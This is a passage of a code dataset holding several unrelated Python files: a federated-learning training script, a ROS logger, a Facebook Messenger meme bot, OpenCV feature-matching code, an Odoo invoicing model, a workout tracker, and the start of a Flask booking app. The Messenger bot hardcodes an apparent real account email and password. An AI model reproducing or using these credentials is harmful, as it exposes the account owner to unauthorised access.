training')\n parser.add_argument('--dataset', type=str, default='cifar100', help='dataset used for training')\n parser.add_argument('--net_config', type=lambda x: list(map(int, x.split(', '))))\n parser.add_argument('--partition', type=str, default='homo', help='the data partitioning strategy')\n parser.add_argument('--batch-size', type=int, default=64, help='input batch size for training (default: 64)')\n parser.add_argument('--lr', type=float, default=0.1, help='learning rate (default: 0.1)')\n parser.add_argument('--epochs', type=int, default=5, help='number of local epochs')\n parser.add_argument('--n_parties', type=int, default=2, help='number of 
workers in a distributed cluster')\n parser.add_argument('--alg', type=str, default='fedavg',\n help='communication strategy: fedavg/fedprox')\n parser.add_argument('--comm_round', type=int, default=50, help='number of maximum communication roun')\n parser.add_argument('--init_seed', type=int, default=0, help=\"Random seed\")\n parser.add_argument('--dropout_p', type=float, required=False, default=0.0, help=\"Dropout probability. Default=0.0\")\n parser.add_argument('--datadir', type=str, required=False, default=\"./data/\", help=\"Data directory\")\n parser.add_argument('--reg', type=float, default=1e-5, help=\"L2 regularization strength\")\n parser.add_argument('--logdir', type=str, required=False, default=\"./logs/\", help='Log directory path')\n parser.add_argument('--modeldir', type=str, required=False, default=\"./models/\", help='Model directory path')\n parser.add_argument('--beta', type=float, default=0.5,\n help='The parameter for the dirichlet distribution for data partitioning')\n parser.add_argument('--device', type=str, default='cuda:0', help='The device to run the program')\n parser.add_argument('--log_file_name', type=str, default=None, help='The log file name')\n parser.add_argument('--optimizer', type=str, default='sgd', help='the optimizer')\n parser.add_argument('--mu', type=float, default=1, help='the mu parameter for fedprox or moon')\n parser.add_argument('--out_dim', type=int, default=256, help='the output dimension for the projection layer')\n parser.add_argument('--temperature', type=float, default=0.5, help='the temperature parameter for contrastive loss')\n parser.add_argument('--local_max_epoch', type=int, default=100, help='the number of epoch for local optimal training')\n parser.add_argument('--model_buffer_size', type=int, default=1, help='store how many previous models for contrastive loss')\n parser.add_argument('--pool_option', type=str, default='FIFO', help='FIFO or BOX')\n parser.add_argument('--sample_fraction', type=float, default=1.0, help='how many clients are sampled in each round')\n parser.add_argument('--load_model_file', type=str, default=None, help='the model to load as global model')\n parser.add_argument('--load_pool_file', type=str, default=None, help='the old model pool path to load')\n parser.add_argument('--load_model_round', type=int, default=None, help='how many rounds have executed for the loaded model')\n parser.add_argument('--load_first_net', type=int, default=1, help='whether load the first net as old net or not')\n parser.add_argument('--normal_model', type=int, default=0, help='use normal model or aggregate model')\n parser.add_argument('--loss', type=str, default='contrastive')\n parser.add_argument('--save_model',type=int,default=0)\n parser.add_argument('--use_project_head', type=int, default=1)\n parser.add_argument('--server_momentum', type=float, default=0, help='the server momentum (FedAvgM)')\n args = parser.parse_args()\n return args\n\n\n\ndef init_nets(net_configs, n_parties, args, device='cpu'):\n nets = {net_i: None for net_i in range(n_parties)}\n if args.dataset in {'mnist', 'cifar10', 'svhn', 'fmnist'}:\n n_classes = 10\n elif args.dataset == 'celeba':\n n_classes = 2\n elif args.dataset == 'cifar100':\n n_classes = 100\n elif args.dataset == 'tinyimagenet':\n n_classes = 200\n elif args.dataset == 'femnist':\n #print(\"flag\")\n n_classes = 26\n elif args.dataset == 'emnist':\n n_classes = 47\n elif args.dataset == 'xray':\n n_classes = 2\n if args.normal_model:\n for net_i in range(n_parties):\n if args.model 
== 'simple-cnn':\n if args.dataset in (\"cifar10\", \"cinic10\", \"svhn\"):\n #print(\"flag1\")\n net = SimpleCNNMNIST(input_dim=(16 * 4 * 4), hidden_dims=[120, 84], output_dim=10)\n elif args.dataset in (\"mnist\", 'femnist', 'fmnist'):\n #print(\"flag2\")\n net = SimpleCNNMNIST(input_dim=(16 * 4 * 4), hidden_dims=[120, 84], output_dim=10)\n if device == 'cpu':\n net.to(device)\n else:\n net = net.cuda()\n nets[net_i] = net\n else:\n for net_i in range(n_parties):\n if args.use_project_head:\n if args.dataset in (\"cifar10\", \"cinic10\", \"svhn\",\"cifar100\",\"tinyimagenet\"):\n net = ModelFedCon(args.model, args.out_dim, n_classes, net_configs)\n elif args.dataset in (\"mnist\", 'femnist', 'fmnist'):\n net = SimpleCNNMNIST(input_dim=(16 * 4 * 4), hidden_dims=[120, 84], output_dim=10)\n else:\n net = ModelFedCon_noheader(args.model, args.out_dim, n_classes, net_configs)\n if device == 'cpu':\n net.to(device)\n else:\n net = net.cuda()\n nets[net_i] = net\n\n model_meta_data = []\n layer_type = []\n for (k, v) in nets[0].state_dict().items():\n model_meta_data.append(v.shape)\n layer_type.append(k)\n\n return nets, model_meta_data, layer_type\n\n\ndef init_dataloader(args,net_dataidx_map):\n print(\"starting init dataloader\")\n train_dl_local_set=[]\n test_dl_local_set=[]\n for i in range(args.n_parties):\n dataidxs = net_dataidx_map[i]\n train_dl_local, test_dl_local, _, _=get_dataloader(args.dataset, args.datadir, args.batch_size, 32, dataidxs)\n train_dl_local_set.append(train_dl_local)\n test_dl_local_set.append(test_dl_local)\n print(len(train_dl_local_set))\n print(\"finishing init dataloader\")\n return train_dl_local_set,test_dl_local_set\n\n\ndef train_net(net_id, net, train_dataloader, test_dataloader, epochs, lr, args_optimizer, args, device=\"cpu\"):\n net = nn.DataParallel(net)\n net.cuda()\n logger.info('Training network %s' % str(net_id))\n logger.info('n_training: %d' % len(train_dataloader))\n logger.info('n_test: %d' % len(test_dataloader))\n\n train_acc,_ = compute_accuracy(net, train_dataloader, device=device)\n\n test_acc, conf_matrix,_ = compute_accuracy(net, test_dataloader, get_confusion_matrix=True, device=device)\n\n logger.info('>> Pre-Training Training accuracy: {}'.format(train_acc))\n logger.info('>> Pre-Training Test accuracy: {}'.format(test_acc))\n\n if args_optimizer == 'adam':\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, net.parameters()), lr=lr, weight_decay=args.reg)\n elif args_optimizer == 'amsgrad':\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, net.parameters()), lr=lr, weight_decay=args.reg,\n amsgrad=True)\n elif args_optimizer == 'sgd':\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, net.parameters()), lr=lr, momentum=0.9,\n weight_decay=args.reg)\n criterion = nn.CrossEntropyLoss().cuda()\n\n cnt = 0\n\n for epoch in range(epochs):\n epoch_loss_collector = []\n for batch_idx, (x, target) in enumerate(train_dataloader):\n x, target = x.cuda(), target.cuda()\n\n optimizer.zero_grad()\n x.requires_grad = False\n target.requires_grad = False\n target = target.long()\n\n _,_,out = net(x)\n loss = criterion(out, target)\n\n loss.backward()\n optimizer.step()\n\n cnt += 1\n epoch_loss_collector.append(loss.item())\n\n epoch_loss = sum(epoch_loss_collector) / len(epoch_loss_collector)\n logger.info('Epoch: %d Loss: %f' % (epoch, epoch_loss))\n\n\n train_acc, _ = compute_accuracy(net, train_dataloader, device=device)\n test_acc, conf_matrix, _ = compute_accuracy(net, test_dataloader, get_confusion_matrix=True, 
device=device)\n\n logger.info('>> Training accuracy: %f' % train_acc)\n logger.info('>> Test accuracy: %f' % test_acc)\n net.to('cpu')\n\n logger.info(' ** Training complete **')\n return train_acc, test_acc\n\n\n\ndef local_train_net(nets, selected, args, train_dl_set, test_dl, device=\"cpu\"):\n avg_acc = 0.0\n acc_list = []\n if global_model:\n global_model.cuda()\n\n for net_id, net in nets.items():\n \n \n n_epoch = args.epochs\n train_dl_id=selected[net_id]\n logger.info(\"Training network %s\" % (str(train_dl_id)))\n trainacc, testacc = train_net(train_dl_id, net, train_dl_set[train_dl_id], test_dl, n_epoch, args.lr, args.optimizer, args,\n device=device)\n\n logger.info(\"net %d final test acc %f\" % (train_dl_id, testacc))\n\n\n return nets\n\n\nif __name__ == '__main__':\n args = get_args()\n mkdirs(args.logdir)\n mkdirs(args.modeldir)\n if args.log_file_name is None:\n argument_path = 'experiment_arguments-%s.json' % datetime.datetime.now().strftime(\"%Y-%m-%d-%H%M-%S\")\n else:\n argument_path = args.log_file_name + '.json'\n with open(os.path.join(args.logdir, argument_path), 'w') as f:\n json.dump(str(args), f)\n device = torch.device(args.device)\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n if args.log_file_name is None:\n args.log_file_name = 'experiment_log-%s' % (datetime.datetime.now().strftime(\"%Y-%m-%d-%H%M-%S\"))\n\n log_path = args.log_file_name + '.log'\n logging.basicConfig(\n filename=os.path.join(args.logdir, log_path),\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M', level=logging.DEBUG, filemode='w')\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n logger.info(device)\n\n seed = args.init_seed\n logger.info(\"#\" * 100)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n random.seed(seed)\n\n logger.info(\"Partitioning data\")\n X_train, y_train, X_test, y_test, net_dataidx_map, traindata_cls_counts = partition_data(\n args.dataset, args.datadir, args.logdir, args.partition, args.n_parties, beta=args.beta)\n\n n_party_per_round = int(args.n_parties * args.sample_fraction)\n party_list = [i for i in range(args.n_parties)]\n party_list_rounds = []\n if n_party_per_round != args.n_parties:\n for i in range(args.comm_round):\n party_list_rounds.append(random.sample(party_list, n_party_per_round))\n else:\n for i in range(args.comm_round):\n party_list_rounds.append(party_list)\n\n n_classes = len(np.unique(y_train))\n\n train_dl_global, test_dl, train_ds_global, test_ds_global = get_dataloader(args.dataset,\n args.datadir,\n args.batch_size,\n 32)\n\n train_dl_local_set,_=init_dataloader(args,net_dataidx_map)\n \n print(\"len train_dl_global:\", len(train_ds_global))\n train_dl=None\n data_size = len(test_ds_global)\n\n logger.info(\"Initializing nets\")\n \n nets, local_model_meta_data, layer_type = init_nets(args.net_config, n_party_per_round, args, device='cpu')\n\n global_models, global_model_meta_data, global_layer_type = init_nets(args.net_config, 1, args, device='cpu')\n global_model = global_models[0]\n n_comm_rounds = args.comm_round\n if args.load_model_file and args.alg != 'plot_visual':\n global_model.load_state_dict(torch.load(args.load_model_file))\n n_comm_rounds -= args.load_model_round\n global_para = global_model.state_dict()\n for net_id, net in nets.items():\n net.load_state_dict(global_para)\n\n weights=[]\n for i in range(int(args.n_parties*args.sample_fraction)):\n weights.append([])\n 
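# NOTE (added annotation, reading of the code, not from the original author): weights[i]\n        # accumulates each selected slot's local dataset size over the rounds between global\n        # updates; the global model is re-aggregated only every args.skip rounds, after which\n        # the accumulators are reset to zero.\n        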
weights[i]=0\n logger.info(\"Initializing nets\")\n\n for round in range(args.comm_round):\n logger.info(\"in comm round:\" + str(round))\n\n arr = np.arange(args.n_parties)\n np.random.shuffle(arr)\n selected = arr[:int(args.n_parties * args.sample_fraction)]\n\n local_data_points=[len(net_dataidx_map[r]) for r in selected]\n \n index=0\n for i in range(len(local_data_points)):\n weights[i]+=local_data_points[i]\n\n global_para = global_model.state_dict()\n\n local_train_net(nets, selected, args, train_dl_set=train_dl_local_set, test_dl = test_dl, device=device)\n\n if((round+1)%args.skip==0):\n print(\"updating global\")\n\n \n for idx in range(int(args.n_parties* args.sample_fraction)):\n net_para = nets[idx].cpu().state_dict()\n weight=weights[idx]/sum(weights)\n if idx == 0:\n for key in net_para:\n\n global_para[key]=net_para[key]*weight\n else:\n for key in net_para:\n\n global_para[key]+=net_para[key]*weight\n global_model.load_state_dict(global_para)\n\n logger.info('global n_training: %d' % len(train_dl_global))\n logger.info('global n_test: %d' % len(test_dl))\n\n\n\n global_model.cuda()\n train_acc, train_loss = compute_accuracy(global_model, train_dl_global, device=device)\n test_acc, conf_matrix, _ = compute_accuracy(global_model, test_dl, get_confusion_matrix=True, device=device)\n\n logger.info('>> Global Model Train accuracy: %f' % train_acc)\n logger.info('>> Global Model Test accuracy: %f' % test_acc)\n logger.info('>> Global Model Train loss: %f' % train_loss)\n mkdirs(args.modeldir+'fedavg/')\n global_model.to('cpu')\n\n torch.save(global_model.state_dict(), args.modeldir+'fedavg/'+'globalmodel'+args.log_file_name+'.pth')\n torch.save(nets[0].state_dict(), args.modeldir+'fedavg/'+'localmodel0'+args.log_file_name+'.pth')\n \n for net_id, net in nets.items():\n net.load_state_dict(global_para)\n weights[net_id]=0\n\n\n\n","repo_name":"MediaBrain-SJTU/FedSkip","sub_path":"main_skip.py","file_name":"main_skip.py","file_ext":"py","file_size_in_byte":15306,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"6"} +{"seq_id":"25169056455","text":"#!/usr/bin/env python\n\nimport rospy\nfrom sensor_msgs.msg import JointState\nimport csv\n\ncsv_file = open('joint_position_wo_saw.csv', 'wb')\ncsv_writer = csv.writer(csv_file)\ncsv_writer.writerow(['timestamp', 'position'])\n\ndef joint_state_callback(msg):\n \"\"\"\n This callback function prints the effort of each joint to the console in a readable format.\n \"\"\"\n joint_efforts = msg.effort\n joint_names = msg.name\n\n timestamp = rospy.get_time()\n \n position = msg.position[4]\n\n csv_writer.writerow([timestamp, position])\n\n print_message = 'Joint States Efforts:\\n'\n for name, effort in zip(joint_names, joint_efforts):\n print_message += ' {}: {:.2f}\\n'.format(name, effort)\n \n rospy.loginfo(print_message)\n\ndef listener():\n \"\"\"\n Initializes the node, subscriber, and spins to keep the node running.\n \"\"\"\n rospy.init_node('joint_state_printer', anonymous=True)\n rospy.Subscriber(\"/joint_states\", JointState, joint_state_callback)\n rospy.spin()\n\nif __name__ == '__main__':\n try:\n listener()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"namhyeongwoo/human_robotics","sub_path":"scripts/joint_state_subscriber.py","file_name":"joint_state_subscriber.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"71200355067","text":"# -*- coding: UTF-8 -*-\nimport 
pickle, os, string, random, srtgen\nfrom moviepy.editor import *\nfrom fbchat import Client, log\nfrom fbchat.models import *\n\nprefix = [\"o!\", \"O!\"]\nowo_uwu = ['owo', 'uwu']\n\n# this is super gay but it works\nremap_dict = {\n \"?\": \"\\U00002753\",\n \"!\": \"\\U00002757\",\n \"+\": \"\\U00002795\",\n \"-\": \"\\U00002796\",\n \"#\": \"#️⃣\",\n \"*\":\"*️⃣\",\n \"0\": \"0️\",\n \"1\": \"1️⃣\",\n \"2\": \"2️⃣\",\n \"3\": \"3️⃣\",\n \"4\": \"4️⃣\",\n \"5\": \"5️⃣\",\n \"6\": \"6️⃣\",\n \"7\": \"7️⃣\",\n \"8\": \"8️⃣\",\n \"9\": \"9️⃣\",\n}\n\nhelp_items = {\n \"em \": \"Converts your message into emoji\",\n \"sb\": \"Converts your message into retard Spongebob text\",\n \"help\": \"Displays this help message\",\n \"jojoke\": \"Posts a random JoJoke (WIP)\",\n \"wjj\": \"Posts a random 'Watch JoJo' meme (WIP)\",\n \"bajj\": \"Posts a random 'Before/After JoJO' meme (WIP)\",\n \"ynl \": \"Generates a \\\"Your next line is...\\\" GIF with your message\"\n}\n\nprocessing_messages = [\"👌 Comin' right up\", \"⏲️ Working on it...\", \"✔️ Yes sir!\", \"⏲️ Hol' your horses, I'm doing my best!\"]\n\ndef spongebob(msg):\n result = msg.lower()\n flipflop = True\n for x in range(0,len(msg)):\n if ord(msg[x]) in range(ord('a'), ord('z')):\n if flipflop:\n result = result.replace(msg[x],msg[x].upper(), 1)\n flipflop = not flipflop\n return result\n\ndef make_emoji(msg):\n result = (\" \".join(map(lambda y : str(y),msg))).lower()\n\n for x in range(0,len(msg)):\n if ord(msg[x]) in range(ord('a'), ord('z')):\n # cool unicode range magic\n result = result.replace(msg[x], chr(ord(msg[x]) + 0x1F185),1)\n elif msg[x] in remap_dict:\n result = result.replace(msg[x], remap_dict[msg[x]],1)\n\n return result\n\ndef get_jojoke(_type):\n path = \"\"\n if _type == \"jojoke\": path = r\"C:\\Users\\User\\Google Drive\\Jojokes\"\n elif _type == \"wjj\": path = r\"C:\\Users\\User\\Google Drive\\Jojokes\\watch jojo\"\n elif _type == \"bajj\": path = r\"C:\\Users\\User\\Google Drive\\Jojokes\\before after jojo\"\n return os.path.join(path,random.choice([x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))]))\n\n\nclass OwOBot(Client):\n def onMessage(self, author_id, message_object, thread_id, thread_type, **kwargs):\n if message_object.text == None:\n super(OwOBot, self).onMessage(\n author_id=author_id,\n message_object=message_object,\n thread_id=thread_id,\n thread_type=thread_type,\n **kwargs\n )\n else:\n if author_id == 100009299193226:\n self.reactToMessage(message_object.uid, MessageReaction.YES)\n if message_object.text.lower() in owo_uwu:\n self.reactToMessage(message_object.uid, MessageReaction.LOVE)\n if message_object.text[0:2] in prefix:\n msg_content = message_object.text[2::]\n self.markAsDelivered(thread_id, message_object.uid)\n self.markAsRead(thread_id)\n\n log.info(\"{} from {} in {}\".format(message_object, thread_id, thread_type.name))\n\n if author_id != self.uid:\n args = msg_content.split()\n\n cmd = args[0].lower()\n\n if cmd == \"help\":\n self.send(Message(text=\"Current prefixes: %s\\r\\nAvailable commands:\\r\\n\\t%s\" % (\", \".join(prefix), \"\\r\\n\\t\".join(map(lambda x : \": \".join(map(lambda y : str(y), x)), help_items.items())))), thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"em\":\n self.send(Message(text=make_emoji(\" \".join(args[1::]))), thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"sb\":\n self.send(Message(text=spongebob(\" \".join(args[1::]))), thread_id=thread_id, thread_type=thread_type)\n elif cmd == \"ynl\":\n 
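An aside on the arithmetic in `make_emoji()` above, as a quick interpreter check: adding the offset `0x1F185` to a lowercase ASCII code point lands in Unicode's regional-indicator block, which is what turns plain letters into letter emoji.

    >>> hex(ord('a') + 0x1F185)
    '0x1f1e6'
    >>> chr(ord('a') + 0x1F185)   # U+1F1E6 REGIONAL INDICATOR SYMBOL LETTER A
    '🇦'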
self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n                        srtgen.composite_gif(\" \".join(args[1::]))\n                        self.sendLocalImage(r\"D:\Final Renders\result.gif\",thread_id=thread_id, thread_type=thread_type)\n                        os.remove(r\"D:\Final Renders\result.gif\")\n                    elif cmd == \"jojoke\":\n                        self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n                        joke = get_jojoke(\"jojoke\")\n                        self.sendLocalImage(joke,thread_id=thread_id, thread_type=thread_type)\n                    elif cmd == \"wjj\":\n                        self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n                        joke = get_jojoke(\"wjj\")\n                        self.sendLocalImage(joke,thread_id=thread_id, thread_type=thread_type)\n                    elif cmd == \"bajj\":\n                        self.send(Message(text=random.choice(processing_messages)),thread_id=thread_id, thread_type=thread_type)\n                        joke = get_jojoke(\"bajj\")\n                        self.sendLocalImage(joke,thread_id=thread_id, thread_type=thread_type)\n                    else:\n                        self.reactToMessage(message_object.uid, MessageReaction.ANGRY)\n                        self.send(Message(text=\"❌ Invalid command\"),thread_id=thread_id, thread_type=thread_type)\n        else:\n            super(OwOBot, self).onMessage(\n                author_id=author_id,\n                message_object=message_object,\n                thread_id=thread_id,\n                thread_type=thread_type,\n                **kwargs\n            )\n\n# Fix: 'username' and 'password' were referenced here without ever being\n# defined, which raised a NameError whenever no cached session existed;\n# fall back to the same credentials used in the cookie branch below.\nusername, password = 'bowot.chan@hotmail.com', 'jJIh7SYBAh6wna'\nclient = OwOBot(username, password, logging_level=30)\n\nif os.path.isfile('cookies.p'):\n    cookies = pickle.load(open('cookies.p','rb'))\n    client = OwOBot('bowot.chan@hotmail.com', 'jJIh7SYBAh6wna',session_cookies=cookies,logging_level=30)\n\nsession = client.getSession()\npickle.dump(session,open('cookies.p','wb'))\n\nprint(\"Own id: {}\".format(client.uid))\nclient.listen()","repo_name":"alwynwan/Messenger-Bot","sub_path":"messenger_bot.py","file_name":"messenger_bot.py","file_ext":"py","file_size_in_byte":6231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
{"seq_id":"19437131825","text":"def run_with_sift():\n    MIN_MATCH_COUNT = 5\n\n    sift = cv2.xfeatures2d.SURF_create()\n    #sift = cv2.ORB_create()\n    img1 = cv2.imread('./sample_img/video1_img.png',0)          # queryImage\n    #img1 = imutils.resize(img1, width=800)\n    kp1, des1 = sift.detectAndCompute(img1,None)\n\n    #img2 = cv2.imread('./sample_img/all_object.png',0) # trainImage\n\n    cam = cv2.VideoCapture('./videos/videofile.mp4')\n    cam2 = cv2.VideoCapture('./videos/videofile_inroom.avi')\n    while True:\n        (ret, img2) = cam.read()\n        (ret, img2_2) = cam2.read()\n        if cv2.waitKey(18) == ord('e'):\n            bbx:BBoundingBox = crop_img_process(img2)\n            img1 = img2[bbx.pY:(bbx.pY + bbx.height), bbx.pX:(bbx.pX + bbx.width), 0]\n            cv2.imshow('im_out', img1)\n\n        # find the keypoints and descriptors with SIFT\n        kp2, des2 = sift.detectAndCompute(img2,None)\n\n        #flann base matcher\n        FLANN_INDEX_KDTREE = 0\n        index_params = dict(algorithm = FLANN_INDEX_KDTREE, trees = 5)\n        search_params = dict(checks = 50)\n        flann = cv2.FlannBasedMatcher(index_params, search_params)\n        matches = flann.knnMatch(des1,des2,k=2)\n        good = []\n        for m,n in matches:\n            if m.distance < 0.7*n.distance:\n                good.append(m)\n\n        #bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n        #matches = bf.match(des1, des2)\n        #good = sorted(matches, key = lambda x:x.distance)\n        # store all the good matches as per Lowe's ratio test.\n        \n        \n\n        if len(good) > MIN_MATCH_COUNT:\n            src_pts = np.float32([ kp1[m.queryIdx].pt for m in good ]).reshape(-1,1,2)\n            dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good ]).reshape(-1,1,2)\n\n            M, mask = 
cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n matchesMask = mask.ravel().tolist()\n\n h,w = img1.shape\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,M)\n\n x, y = [], []\n for element in np.int32(dst):\n for item in element:\n x.append(item[0])\n y.append(item[1])\n x1, x2, y1, y2 = min(x), max(x), min(y), max(y)\n if x1 >= 0 and x2 >= 0 and y1 >= 0 and y2 >= 0:\n img1 = img2[y1:y2, x1:x2, 0]\n cv2.imshow('im_out', img1)\n img2 = cv2.rectangle(img2, (x1, y1), (x2, y2), (0, 255, 0), 1)\n #img2 = cv2.polylines(img2,np.int32(dst),True,255,3, cv2.LINE_AA)\n else:\n print (\"Not enough matches are found - %d/%d\" % (len(good),MIN_MATCH_COUNT))\n matchesMask = None\n\n draw_params = dict(matchColor = (0,255,0), # draw matches in green color\n singlePointColor = None,\n matchesMask = matchesMask, # draw only inliers\n flags = 2)\n\n img3 = cv2.drawMatches(img1,kp1,img2,kp2,good,None,**draw_params)\n cv2.imshow('gray', img3)\n cv2.imshow('cam2', img2_2)\n\n #update the query image\n kp1, des1 = sift.detectAndCompute(img1, None)\n\n if cv2.waitKey(1) == 27:\n break\n\ndef run_with_orb():\n MIN_MATCH_COUNT = 4\n ## Create ORB object and BF object(using HAMMING)\n #orb = cv2.ORB_create()\n orb = cv2.ORB_create()\n img1 = cv2.imread('./sample_img/test1.jpg')\n img1 = imutils.resize(img1, width=400)\n img2 = cv2.imread('./sample_img/test1.1.jpg')\n img2 = imutils.resize(img2, width=400)\n\n gray2 = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n gray1 = cv2.cvtColor(img1, cv2.COLOR_BGR2GRAY)\n\n ## Find the keypoints and descriptors with ORB\n kpts1, descs1 = orb.detectAndCompute(gray1,None)\n kpts2, descs2 = orb.detectAndCompute(gray2,None)\n\n ## match descriptors and sort them in the order of their distance\n bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = bf.match(descs1, descs2)\n dmatches = sorted(matches, key = lambda x:x.distance)\n\n ## extract the matched keypoints\n src_pts = np.float32([kpts1[m.queryIdx].pt for m in dmatches]).reshape(-1,1,2)\n dst_pts = np.float32([kpts2[m.trainIdx].pt for m in dmatches]).reshape(-1,1,2)\n\n ## find homography matrix and do perspective transform\n M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)\n h,w = img1.shape[:2]\n pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)\n dst = cv2.perspectiveTransform(pts,M)\n\n ## draw found regions\n img2 = cv2.polylines(img2, [np.int32(dst)], True, (0,0,255), 1, cv2.LINE_AA)\n cv2.imshow(\"found\", img2)\n\n ## draw match lines\n res = cv2.drawMatches(img1, kpts1, img2, kpts2, dmatches[:20],None,flags=2)\n\n cv2.imshow(\"orb_match\", res);\n\n cv2.waitKey();cv2.destroyAllWindows()\n","repo_name":"vohoangan123456/ThesisImplementationObjectTracking","sub_path":"ThesisImplementationObjectTracking/my_working_space/stuffs/abandoned_functions.py","file_name":"abandoned_functions.py","file_ext":"py","file_size_in_byte":4872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"2077814007","text":"from odoo import models, fields, api, exceptions\nfrom odoo.exceptions import UserError\nfrom datetime import datetime\nclass ext(models.Model):\n _inherit=\"account.move\"\n def create_auto_invoices(self):\n todaydate=datetime.now().date()\n enrolement_status = self.env['school.enrollment.status'].search([('name','=',\"Enrolled\")])\n enrollment_ids=[i.id for i in enrolement_status]\n students= 
self.env['school.student'].search([('enrollment_status_ids','in',enrollment_ids)])\n journals = self.env['account.journal'].search([('name','=',\"Monthly Bills\")])\n journal_ids=[i.id for i in journals]\n tuition_plans=self.env[\"tuition.plan\"].search([('student_id','in',students.ids),('journal_id','in',journal_ids),('state','=','posted')])\n \n # installments=env[\"tuition.installment\"].search([(\"tuition_plan_id\",\"in\",tuition_plans.ids),(\"x_inv_date\",'=',todaydate)])\n\n for plan in tuition_plans:\n while plan.next_installment_id.x_inv_date==todaydate:\n plan.button_create_charge()\n return\n","repo_name":"Odolution/lacas","sub_path":"ol_auto_invoice/models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"30793276105","text":"import requests\nfrom dotenv import load_dotenv\nfrom os import getenv\nfrom datetime import datetime\n\nGENDER = \"male\"\nWEIGHT_KG = 77.7\nHEIGHT_CM = 182.88\nAGE = 22\n\nload_dotenv()\n# Nutrionix API\nNUTRITIONIX_API_ID = getenv(\"NUTRITIONIX_API_ID\")\nNUTRITIONIX_API_KEY = getenv(\"NUTRITIONIX_API_KEY\")\nnutritionix_endpoint = \"https://trackapi.nutritionix.com/v2/natural/exercise\"\n\n# Sheety API\nSPREADSHEET_ENDPOINT = getenv(\"SPREADSHEET_ENDPOINT\")\nSPREADSHEET_AUTH_CODE = getenv(\"SPREADSHEET_AUTH_CODE\")\n\nquery = input(\"Tell me which exercises you did: \")\n\nexercise_headers = {\n \"x-app-id\" : NUTRITIONIX_API_ID,\n \"x-app-key\" : NUTRITIONIX_API_KEY,\n}\n\nexercise_params = {\n \"query\" : query,\n \"gender\" : GENDER,\n \"weight_kg\" : WEIGHT_KG,\n \"height_cm\" : HEIGHT_CM,\n \"age\" : AGE,\n}\n\nexercise_data = requests.post(url=nutritionix_endpoint, json=exercise_params, headers=exercise_headers)\nexercise_data.raise_for_status()\nresult = exercise_data.json()\n# print(f\"Nutritionix API call: \\n {result} \\n\")\n\ntoday = datetime.now()\ntoday_date = today.strftime(\"%d/%m/%Y\")\ntime_now = today.strftime(\"%H:%M:%S\")\n\n# Sheety API\nGOOGLE_SHEET_NAME = \"sheet1\"\nsheety_headers = {\n \"Authorization\" : SPREADSHEET_AUTH_CODE,\n}\nsheety_endpoint = SPREADSHEET_ENDPOINT\n\nfor exercise in result[\"exercises\"]:\n new_row = {\n GOOGLE_SHEET_NAME : {\n \"date\" : today_date,\n \"time\" : time_now,\n \"exercise\" : exercise[\"name\"].title(),\n \"duration\" : exercise[\"duration_min\"],\n \"calories\" : exercise[\"nf_calories\"],\n\n }\n }\n\n response = requests.post(url=sheety_endpoint, json=new_row, headers=sheety_headers)\n print(response.text)","repo_name":"shrijanlakhey/100-days-of-Python","sub_path":"038/workout_tracker.py","file_name":"workout_tracker.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"73644100026","text":"import os\n\nfrom flask import Flask, render_template, session, request\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import scoped_session, sessionmaker\n\napp = Flask(__name__)\n\nengine = create_engine(os.getenv(\"DATABASE_URL\"))\ndb = scoped_session(sessionmaker(bind=engine))\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/booker\", methods=[\"GET\", \"POST\"])\ndef booker():\n flights = []\n error = \"\"\n if request.method == \"GET\" or \"POST\":\n flights = db.execute(\"select * from flights\")\n if request.method == \"POST\":\n try:\n flight_id = request.form.get(\"flightId\")\n surname = 
